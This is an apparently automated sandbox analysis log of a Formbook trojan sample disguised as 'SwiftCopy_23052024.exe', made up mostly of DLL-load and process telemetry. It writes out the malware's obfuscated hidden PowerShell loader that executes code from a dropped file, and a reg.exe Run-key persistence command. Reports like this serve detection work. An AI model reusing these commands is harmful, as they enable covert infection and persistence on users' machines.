Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225EFA49 18_2_225EFA49
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225E7A46 18_2_225E7A46
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A3A6C 18_2_225A3A6C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225DDAC6 18_2_225DDAC6
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225CDAAC 18_2_225CDAAC
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22575AA0 18_2_22575AA0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225EFB76 18_2_225EFB76
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A5BF0 18_2_225A5BF0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2256DBF9 18_2_2256DBF9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259D800 18_2_2259D800
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225338E0 18_2_225338E0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22539950 18_2_22539950
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254B950 18_2_2254B950
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22539EB0 18_2_22539EB0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225EFF09 18_2_225EFF09
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22531F92 18_2_22531F92
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225EFFB1 18_2_225EFFB1
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225EFCF2 18_2_225EFCF2
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225E1D5A 18_2_225E1D5A
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22533D40 18_2_22533D40
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: String function: 2259EA12 appears 82 times
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: String function: 2251B970 appears 264 times
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: String function: 22565130 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: String function: 225AF290 appears 102 times
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: String function: 22577E54 appears 97 times
PE / OLE file has an invalid certificate
Source: SwiftCopy_23052024.exe Static PE information: invalid certificate
Sample file is different than original file name gathered from version info
Source: SwiftCopy_23052024.exe, 00000000.00000002.1237130998.00000000007CC000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamesemirelief.exeP vs SwiftCopy_23052024.exe
Uses 32bit PE files
Source: SwiftCopy_23052024.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Uses reg.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)"
Yara signature match
Source: 00000019.00000002.2439774111.0000000000A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000019.00000002.2439886382.0000000000A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000012.00000002.2375239145.00000000221D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000019.00000002.2436294055.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001A.00000002.2441331167.00000000052D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000017.00000002.2440680912.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000012.00000002.2375924840.0000000022840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.evad.winEXE@17/22@2/1
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Code function: 0_2_00403248 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403248
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Code function: 0_2_0040450D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_0040450D
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Code function: 0_2_00402138 CoCreateInstance,MultiByteToWideChar, 0_2_00402138
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe File created: C:\Users\user\AppData\Roaming\fertiliseringer Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4480:120:WilError_03
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe File created: C:\Users\user~1\AppData\Local\Temp\nsz14C1.tmp Jump to behavior
Source: SwiftCopy_23052024.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: SwiftCopy_23052024.exe ReversingLabs: Detection: 26%
Source: SwiftCopy_23052024.exe Virustotal: Detection: 27%
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe File read: C:\Users\user\Desktop\SwiftCopy_23052024.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SwiftCopy_23052024.exe "C:\Users\user\Desktop\SwiftCopy_23052024.exe"
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommeregnerens178)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe "C:\Users\user~1\AppData\Local\Temp\Tabsgivende.exe"
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)"
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe Process created: C:\Windows\SysWOW64\Magnify.exe "C:\Windows\SysWOW64\Magnify.exe"
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe Process created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe"
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommeregnerens178)" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe "C:\Users\user~1\AppData\Local\Temp\Tabsgivende.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)" Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe Process created: C:\Windows\SysWOW64\Magnify.exe "C:\Windows\SysWOW64\Magnify.exe" Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe Process created: C:\Windows\SysWOW64\wlanext.exe "C:\Windows\SysWOW64\wlanext.exe" Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\SwiftCopy_23052024.exe File written: C:\Users\user\AppData\Local\Temp\acrometer.ini Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: SwiftCopy_23052024.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: .Automation.pdb source: powershell.exe, 00000002.00000002.2185214744.0000000002793000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdb source: Tabsgivende.exe, 00000012.00000001.2023172133.0000000000649000.00000020.00000001.01000000.00000009.sdmp
Source: Binary string: wntdll.pdbUGP source: Tabsgivende.exe, 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2245564278.0000000022346000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2243316011.0000000022199000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Tabsgivende.exe, Tabsgivende.exe, 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2245564278.0000000022346000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2243316011.0000000022199000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wlanext.pdb source: Tabsgivende.exe, 00000012.00000003.2301820383.00000000066AF000.00000004.00000020.00020000.00000000.sdmp, Tabsgivende.exe, 00000012.00000003.2301840277.0000000022211000.00000004.00000020.00020000.00000000.sdmp
